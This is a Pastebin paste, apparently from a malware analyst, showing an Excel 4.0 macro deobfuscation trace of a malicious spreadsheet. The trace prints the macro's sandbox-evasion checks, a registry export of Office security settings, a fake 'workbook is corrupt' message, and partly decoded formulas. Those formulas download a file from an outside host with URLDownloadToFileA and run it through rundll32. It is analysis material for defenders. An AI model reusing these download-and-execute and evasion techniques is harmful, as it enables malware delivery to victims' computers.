API tools faq
paste
dissectmalware

Untitled

dissectmalware
May 16th, 2020
361
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.11 KB | None | 0 0
raw download clone embed print report
  1. 4ee0eabfb6c607e8f4de310070aac4c98a396e443f3752ea454de0141e6f49d2
  2.  
  3. Converted to XLSM
  4.  
  5. [Loading Cells]
  6. auto_open: auto_open9fi0g->Sheet2!$IA$48686
  7. [Starting Deobfuscation]
  8. CELL:IA48686 , FullEvaluation ,SET.VALUE(Sheet2!BF33425,"452")
  9. CELL:IA48687 , FullEvaluation ,RUN(Sheet2!FS63410)
  10. CELL:FS63410 , FullEvaluation ,SET.VALUE(Sheet2!CU54656,"362")
  11. CELL:FS63411 , FullEvaluation ,GOTO(FZ4458)
  12. CELL:FZ4458 , FullEvaluation ,SET.VALUE(Sheet2!HA60322,"353.25")
  13. CELL:FZ4459 , FullEvaluation ,RUN(Sheet2!GD22340)
  14. CELL:GD22340 , FullEvaluation ,SET.VALUE(Sheet2!DD46357,"37.4")
  15. CELL:GD22341 , FullEvaluation ,GOTO(FP20455)
  16. CELL:FP20455 , FullEvaluation ,SET.VALUE(Sheet2!HS63601,"347")
  17. CELL:FP20456 , FullEvaluation ,RUN(Sheet2!AS4091)
  18. CELL:AS4091 , FullEvaluation ,SET.VALUE(Sheet2!CO18346,"378.9")
  19. CELL:AS4092 , FullEvaluation ,GOTO(HG31988)
  20. CELL:HG31988 , FullEvaluation ,SET.VALUE(Sheet2!CN26725,"385")
  21. CELL:HG31989 , FullEvaluation ,GOTO(CH10763)
  22. CELL:CH10763 , FullEvaluation ,SET.VALUE(Sheet2!FK14427,"-449")
  23. CELL:CH10764 , FullEvaluation ,RUN(Sheet2!IH26999)
  24. CELL:IH26999 , FullEvaluation ,SET.VALUE(Sheet2!GA34525,"292")
  25. CELL:IH27000 , FullEvaluation ,RUN(Sheet2!FF59546)
  26. CELL:FF59546 , FullEvaluation ,SET.VALUE(Sheet2!ID42616,"-32.8")
  27. CELL:FF59547 , FullEvaluation ,GOTO(GZ54602)
  28. CELL:GZ54602 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Sheet2!CO5751)
  29. CELL:GZ54603 , FullEvaluation ,GOTO(R36106)
  30. CELL:R36106 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!R36107)
  31. CELL:R36107 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:R36108 , FullEvaluation ,RUN(Sheet2!DW5410)
  33. CELL:DW5410 , FullEvaluation ,FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[340]C[-34]),)",Sheet2!DW5411)
  34. CELL:DW5411 , FullBranching ,IF(GET.WINDOW(7),GOTO(R[340]C[-34]),)
  35. CELL:DW5411 , FullEvaluation ,[TRUE] GOTO(R[340]C[-34])
  36. CELL:CO5751 , End , CLOSE(FALSE)
  37. CELL:DW5411 , FullEvaluation ,[FALSE]
  38. CELL:DW5412 , FullEvaluation , GOTO(AR13749)
  39. CELL:AR13749 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-7999]C[49]))",Sheet2!AR13750)
  40. CELL:AR13750 , FullBranching , IF(GET.WINDOW(20),,GOTO(R[-7999]C[49]))
  41. CELL:AR13750 , FullEvaluation , [TRUE]
  42. CELL:AR13751 , FullEvaluation , GOTO(AV29078)
  43. CELL:AV29078 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-23328]C[45]),)",Sheet2!AV29079)
  44. CELL:AV29079 , FullBranching , IF(GET.WINDOW(23)<3,GOTO(R[-23328]C[45]),)
  45. CELL:AV29079 , FullEvaluation , [TRUE] GOTO(R[-23328]C[45])
  46. CELL:CO5751 , End , CLOSE(FALSE)
  47. CELL:AV29079 , FullEvaluation , [FALSE]
  48. CELL:AV29080 , FullEvaluation , RUN(Sheet2!BJ46325)
  49. CELL:BJ46325 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[-40575]C[31]),)",Sheet2!BJ46326)
  50. CELL:BJ46326 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-40575]C[31]),)
  51. CELL:BJ46327 , FullEvaluation , GOTO(GE27718)
  52. CELL:GE27718 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[-21968]C[-94]),)",Sheet2!GE27719)
  53. CELL:GE27719 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-21968]C[-94]),)
  54. CELL:GE27719 , FullEvaluation , [TRUE] GOTO(R[-21968]C[-94])
  55. CELL:CO5751 , End , CLOSE(FALSE)
  56. CELL:GE27719 , FullEvaluation , [FALSE]
  57. CELL:GE27720 , FullEvaluation , GOTO(CP60011)
  58. CELL:CP60011 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[-54261]C[-1]),)",Sheet2!CP60012)
  59. CELL:CP60012 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-54261]C[-1]),)
  60. CELL:CP60012 , FullEvaluation , [TRUE] GOTO(R[-54261]C[-1])
  61. CELL:CO5751 , End , CLOSE(FALSE)
  62. CELL:CP60012 , FullEvaluation , [FALSE]
  63. CELL:CP60013 , FullEvaluation , GOTO(CS19608)
  64. CELL:CS19608 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[-13858]C[-4]))",Sheet2!CS19609)
  65. CELL:CS19609 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-13858]C[-4]))
  66. CELL:CS19610 , FullEvaluation , RUN(Sheet2!GS29666)
  67. CELL:GS29666 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[-23916]C[-108]))",Sheet2!GS29667)
  68. CELL:GS29667 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-23916]C[-108]))
  69. CELL:GS29668 , FullEvaluation , RUN(Sheet2!HU29308)
  70. CELL:HU29308 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-23558]C[-136]))",Sheet2!HU29309)
  71. CELL:HU29309 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-23558]C[-136]))
  72. CELL:HU29310 , FullEvaluation , RUN(Sheet2!AU60634)
  73. CELL:AU60634 , FullEvaluation , FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!BV63598)
  74. CELL:AU60635 , FullEvaluation , GOTO(DO44944)
  75. CELL:DO44944 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\f1UGQ65Y.reg""",Sheet2!FE45508)
  76. CELL:DO44945 , FullEvaluation , GOTO(FS57593)
  77. CELL:FS57593 , FullEvaluation , FORMULA.FILL("=R[30457]C[-62]&GET.WORKSPACE(2)&""\Excel\Security ""&R[12367]C[25]&"" /y""",Sheet2!EF33141)
  78. CELL:FS57594 , FullEvaluation , GOTO(GT35338)
  79. CELL:GT35338 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!IT40138)
  80. CELL:GT35339 , FullEvaluation , RUN(Sheet2!DN48647)
  81. CELL:DN48647 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-8510]C[136],R[-15507]C[18],0,5)",Sheet2!DN48648)
  82. CELL:DN48648 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",IT40138,EF33141,0,5)
  83. CELL:DN48649 , FullEvaluation , GOTO(EH10889)
  84. CELL:EH10889 , FullEvaluation , FORMULA.FILL("=WHILE(ISERROR(FILES(R[34616]C[23])))",Sheet2!EH10892)
  85. CELL:EH10890 , FullEvaluation , FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!EH10893)
  86. CELL:EH10891 , FullEvaluation , FORMULA.FILL("=NEXT()",Sheet2!EH10894)
  87. CELL:EH10892 , PartialEvaluation , WHILE(None)
  88. CELL:EH10893 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  89. CELL:EH10894 , PartialEvaluation , NEXT()
  90. CELL:EH10895 , FullEvaluation , RUN(Sheet2!EW52359)
  91. CELL:EW52359 , FullEvaluation , FORMULA.FILL("=FOPEN(R[-6852]C[8])",Sheet2!EW52360)
  92. CELL:EW52360 , PartialEvaluation , FOPEN(None)
  93. CELL:EW52361 , FullEvaluation , RUN(Sheet2!DG39478)
  94. CELL:DG39478 , FullEvaluation , FORMULA.FILL("=FPOS(R[12881]C[42],215)",Sheet2!DG39479)
  95. CELL:DG39479 , PartialEvaluation , FPOS(None,215)
  96. CELL:DG39480 , FullEvaluation , RUN(Sheet2!BA40220)
  97. CELL:BA40220 , FullEvaluation , FORMULA.FILL("=FREAD(R[12139]C[100],255)",Sheet2!BA40221)
  98. CELL:BA40221 , PartialEvaluation , FREAD(None,255)
  99. CELL:BA40222 , FullEvaluation , GOTO(FC7960)
  100. CELL:FC7960 , FullEvaluation , FORMULA.FILL("=FCLOSE(R[44399]C[-6])",Sheet2!FC7961)
  101. CELL:FC7961 , PartialEvaluation , FCLOSE(None)
  102. CELL:FC7962 , FullEvaluation , RUN(Sheet2!FL54842)
  103. CELL:FL54842 , FullEvaluation , FORMULA.FILL("=FILE.DELETE(R[-9335]C[-7])",Sheet2!FL54843)
  104. CELL:FL54843 , NotImplemented , FILE.DELETE(R[-9335]C[-7])
  105. CELL:FL54844 , FullEvaluation , GOTO(GZ65133)
  106. CELL:GZ65133 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-24913]C[-155])),GOTO(R[-59383]C[-115]),)",Sheet2!GZ65134)
  107. CELL:GZ65134 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-24913]C[-155])),GOTO(R[-59383]C[-115]),)
  108. CELL:GZ65135 , FullEvaluation , RUN(Sheet2!DK15540)
  109. CELL:DK15540 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\bc1aX2Yl.html""",Sheet2!GB56762)
  110. CELL:DK15541 , FullEvaluation , GOTO(EU27114)
  111. CELL:EU27114 , FullEvaluation , FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!BN972)
  112. CELL:EU27115 , FullEvaluation , RUN(Sheet2!AW51716)
  113. CELL:AW51716 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-50745]C[17],R[5045]C[135],0,0)",Sheet2!AW51717)
  114. CELL:AW51717 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BN972,GB56762,0,0)
  115. CELL:AW51718 , FullEvaluation , RUN(Sheet2!BV33962)
  116. CELL:BV33962 , FullEvaluation , FORMULA.FILL("=FILES(R[22799]C[110])",Sheet2!BV33963)
  117. CELL:BV33963 , PartialEvaluation , FILES(None)
  118. CELL:BV33964 , FullEvaluation , RUN(Sheet2!BQ14965)
  119. CELL:BQ14965 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[18997]C[5]),GOTO(R[-9215]C[24]),)",Sheet2!BQ14966)
  120. CELL:BQ14966 , FullBranching , IF(ISERROR(R[18997]C[5]),GOTO(R[-9215]C[24]),)
  121. CELL:BQ14966 , FullEvaluation , [TRUE] GOTO(R[-9215]C[24])
  122. CELL:CO5751 , End , CLOSE(FALSE)
  123. CELL:BQ14966 , FullEvaluation , [FALSE]
  124. CELL:BQ14967 , FullEvaluation , GOTO(C35060)
  125. CELL:C35060 , FullEvaluation , SET.VALUE(Sheet2!AC61236,"8")
  126. CELL:C35061 , FullEvaluation , RUN(Sheet2!IN29353)
  127. CELL:IN29353 , FullEvaluation , SET.VALUE(Sheet2!FL6796,"-87")
  128. CELL:IN29354 , FullEvaluation , RUN(Sheet2!FN36847)
  129. CELL:FN36847 , FullEvaluation , SET.VALUE(Sheet2!BW8389,"-8.8")
  130. CELL:FN36848 , FullEvaluation , GOTO(IK6985)
  131. CELL:IK6985 , FullEvaluation , SET.VALUE(Sheet2!CA12945,"-45.5")
  132. CELL:IK6986 , FullEvaluation , RUN(Sheet2!DY25530)
  133. CELL:DY25530 , FullEvaluation , SET.VALUE(Sheet2!FL38246,"68")
  134. CELL:DY25531 , FullEvaluation , GOTO(FZ18874)
  135. CELL:FZ18874 , FullEvaluation , SET.VALUE(Sheet2!DK36937,"-234")
  136. CELL:FZ18875 , FullEvaluation , RUN(Sheet2!FH45323)
  137. CELL:FH45323 , FullEvaluation , SET.VALUE(Sheet2!FT22661,"137")
  138. CELL:FH45324 , FullEvaluation , RUN(Sheet2!EA15701)
  139. CELL:EA15701 , FullEvaluation , SET.VALUE(Sheet2!BA49121,"7")
  140. CELL:EA15702 , FullEvaluation , RUN(Sheet2!GT46470)
  141. CELL:GT46470 , PartialEvaluation , SET.VALUE(Sheet2!DT60050,"-335-GET.CELL(8,AA12995)*4")
  142. CELL:GT46471 , FullEvaluation , RUN(Sheet2!Q12129)
  143. CELL:Q12129 , FullEvaluation , SET.VALUE(Sheet2!GZ47039,"-438")
  144. CELL:Q12130 , FullEvaluation , GOTO(CK16427)
  145. CELL:CK16427 , PartialEvaluation , FORMULA.FILL("<!C:\Users\Publg&CHAR(DT60050+438)&CHAR(DT60050--431)&D&CHAR(DT60050--438)&a&CHAR(DT60050*-0.14749262536873156)&CHAR(DT60050/-4.9130434782608692)&TA4-gtml""",Sheet2!GQ27768)
  146. CELL:CK16428 , FullEvaluation , GOTO(GZ3551)
  147. CELL:GZ3551 , PartialEvaluation , FORMULA.FILL("<!https:./gavqelets-ru/wo-keys-&CHAR(DT60050--451)&hp&CHAR(DT60050/-9.9705882352941178)",Sheet2!FX27683)
  148. CELL:GZ3552 , FullEvaluation , GOTO(FB63284)
  149. CELL:FB63284 , PartialEvaluation , FORMULA.FILL("=CA&CHAR(DT60050/-4.4605263157894735)&L(""urlmon""+""URLDn&CHAR(DT60050+458)&CHAR(DT60050/-3.081818181818182)&loadT&CHAR(DT60050*-0.32743362831858408)&F&CHAR(DT60050--444)&le@"",""JJCBJJ&CHAR(DT60050--373)&,&CHAR(DT60050/-7.0625)&,&CHAR(DT60050*-0.24188790560471976)&[0&CHAR(DT60050*-0.14454277286135694)&514]CZ99],R[&CHAR(DT60050--388)&16/8]C[117]&CHAR(DT60050+383)&0,0)",Sheet2!CC16159)
  150. CELL:FB63285 , FullEvaluation , GOTO(BM16959)
  151. CELL:BM16959 , PartialEvaluation , FORMULA.FILL("=FILEQ(R[13&CHAR(DT60050+388)&70]B[4&CHAR(DT60050/-6.5192307692307692)&])",Sheet2!EO14598)
  152. CELL:BM16960 , FullEvaluation , RUN(Sheet2!CR16525)
  153. CELL:CR16525 , PartialEvaluation , FORMULA.FILL("=IF(ISE&CHAR(DT60050*-0.24188790560471976)&ROP&CHAR(DT60050+379)&CHAR(DT60050+421)&[-10963]&CHAR(DT60050+406)&[-&CHAR(DT60050/-6.2777777777777777)&8]),+RUL(R[&CHAR(DT60050+389)&7892]CZ-29]))",Sheet2!HE25561)
  154. CELL:CR16526 , FullEvaluation , GOTO(CP1933)
  155. CELL:CP1933 , PartialEvaluation , FORMULA.FILL("=""https://jap&CHAR(DT60050*-0.28613569321533922)&njis&CHAR(DT60050--443)&n.il&CHAR(DT60050*-0.30088495575221241)&o&CHAR(DT60050+386)&wp-kews.&CHAR(DT60050/-3.0267857142857144)&CHAR(DT60050--443)&p&CHAR(DT60050/-9.9705882352941178)",Sheet2!H50928)
  156. CELL:CP1934 , FullEvaluation , RUN(Sheet2!HG35487)
  157. CELL:HG35487 , PartialEvaluation , FORMULA.FILL("<CALL(""ur&CHAR(DT60050/-3.1388888888888888)&mon"",&CHAR(DT60050--373)&UQJDownloadToFildA"",&CHAR(DT60050*-0.10029498525073746)&JJBCJJ"",/,R[21511]C[&CHAR(DT60050--384)&221],R[8352&CHAR(DT60050+432)&C[-30]+/,0&CHAR(DT60050--380)",Sheet2!HU19416)
  158. CELL:HG35488 , FullEvaluation , GOTO(DQ35869)
  159. CELL:DQ35869 , PartialEvaluation , FORMULA.FILL("<""The woqkbonkcanno&CHAR(DT60050--455)& bd npendd oq qepaire&CHAR(DT60050*-0.29498525073746312)&aw K&CHAR(DT60050+444)&CHAR(DT60050/-3.4242424242424243)&roso&CHAR(DT60050+441)&s&CHAR(DT60050--408)&xcel becausd ht'scorrup&CHAR(DT60050--455)&.""",Sheet2!HV369)
  160. CELL:DQ35870 , FullEvaluation , RUN(Sheet2!EK7801)
  161. CELL:EK7801 , PartialEvaluation , FORMULA.FILL("=@JERS(QZ,52084]C&CHAR(DT60050+430)&46])",Sheet2!GB53453)
  162. CELL:EK7802 , FullEvaluation , GOTO(FZ49710)
  163. CELL:FZ49710 , PartialEvaluation , FORMULA.FILL("CHAR(DT60050*-0.17994100294985252)&""C9\Windov&CHAR(DT60050/-2.9478260869565216)&Zsystem31\r&CHAR(DT60050--456)&ndll31&CHAR(DT60050+385)&exe!",Sheet2!IE5342)
  164. CELL:FZ49711 , FullEvaluation , RUN(Sheet2!GY50399)
  165. CELL:GY50399 , FullEvaluation , FORMULA.FILL("=R[-18092\CZ147]&"",DlkRegisterServeq""",Sheet2!AZ45860)
  166. CELL:GY50400 , FullEvaluation , GOTO(BK55588)
  167. CELL:BK55588 , PartialEvaluation , FORMULA.FILL("=CALL(""Shekl32"",""RheklExdcuteA"",&CHAR(DT60050*-0.10029498525073746)&JJBCBJJ"",0,""open""+&CHAR(DT60050/-4.1341463414634143)&[-49592]C[1&CHAR(DT60050--388)&8],R[-9064]C[3&CHAR(DT60050--388)&],0,4)",Sheet2!U54934)
  168. CELL:BK55589 , FullEvaluation , GOTO(CC16159)
  169. CELL:CC16160 , FullEvaluation , GOTO(EO14598)
  170. CELL:EO14599 , FullEvaluation , RUN(Sheet2!HE25561)
  171. CELL:HE25562 , FullEvaluation , RUN(Sheet2!H50928)
  172. CELL:H50929 , FullEvaluation , GOTO(HU19416)
  173. CELL:HU19417 , FullEvaluation , RUN(Sheet2!HV369)
  174. CELL:HV370 , FullEvaluation , RUN(Sheet2!GB53453)
  175. CELL:GB53454 , FullEvaluation , RUN(Sheet2!IE5342)
  176. CELL:IE5343 , FullEvaluation , GOTO(AZ45860)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!